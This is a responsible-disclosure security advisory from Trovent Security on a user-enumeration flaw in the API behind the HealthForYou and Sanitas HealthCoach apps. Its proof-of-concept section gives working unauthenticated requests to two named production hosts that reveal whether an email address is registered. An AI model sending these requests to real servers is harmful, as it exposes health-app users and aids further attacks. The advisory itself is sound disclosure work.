# Trovent Security Advisory 2104-01 # ##################################### User enumeration through API ############################ Overview ######## Advisory ID: TRSA-2104-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2104-01 Affected product: HealthForYou & Sanitas HealthCoach mobile and web applications Tested versions: HealthForYou 1.11.1 (com.hansdinslage.connect.HealthForYou), HealthCoach 2.9.2 (de.sanitas_online.healthcoach) Vendor: Hans Dinslage GmbH (subsidiary of Beurer GmbH https://www.beurer.com) Credits: Trovent Security GmbH, Nick Decker Detailed description #################### Trovent Security GmbH discovered a vulnerability in the server API of the mobile apps Sanitas HealthCoach and HealthForYou. The API call "/BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=" allows to easily enumerate registered usernames and email addresses. This knowledge could aid an attacker with further exploits as demonstrated by TRSA-2104-02. Severity: Medium CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CWE ID: CWE-203 CVE ID: N/A Proof of concept ################ HealthForYou ############ Sample request to check if my colleague's email address is registered: REQUEST: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GET /BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=s.pietsch@trovent.io HTTP/1.1 Content-Type: application/json; charset=UTF-8 Accept-Encoding: gzip, deflate User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003) Host: sync.healthforyou-lidl.com Connection: close Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ RESPONSE: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block content-type: application/json; charset=utf-8 content-length: 4 etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs" date: Wed, 28 Apr 2021 11:25:24 GMT x-envoy-upstream-service-time: 118 server: istio-envoy connection: close true ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HealthCoach ########### Sample request to check if my colleague's email address is registered: REQUEST: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GET /BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=s.pietsch@trovent.io HTTP/1.1 Content-Type: application/json; charset=UTF-8 Accept-Encoding: gzip, deflate User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003) Host: sync.connect-sanitas-online.de Connection: close Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ RESPONSE: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block content-type: application/json; charset=utf-8 content-length: 4 etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs" date: Wed, 28 Apr 2021 11:34:02 GMT x-envoy-upstream-service-time: 78 server: istio-envoy connection: close true ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### To mitigate this vulnerability, we recommend to disable this API call. In general it is recommended to prevent attackers from enumerating valid usernames. History ####### 2021-04-27: Vulnerability found 2021-04-28: Advisory created, vendor and BSI contacted 2021-04-30: Vendor acknowledged the vulnerability to Trovent and BSI 2021-06-04: Advisory published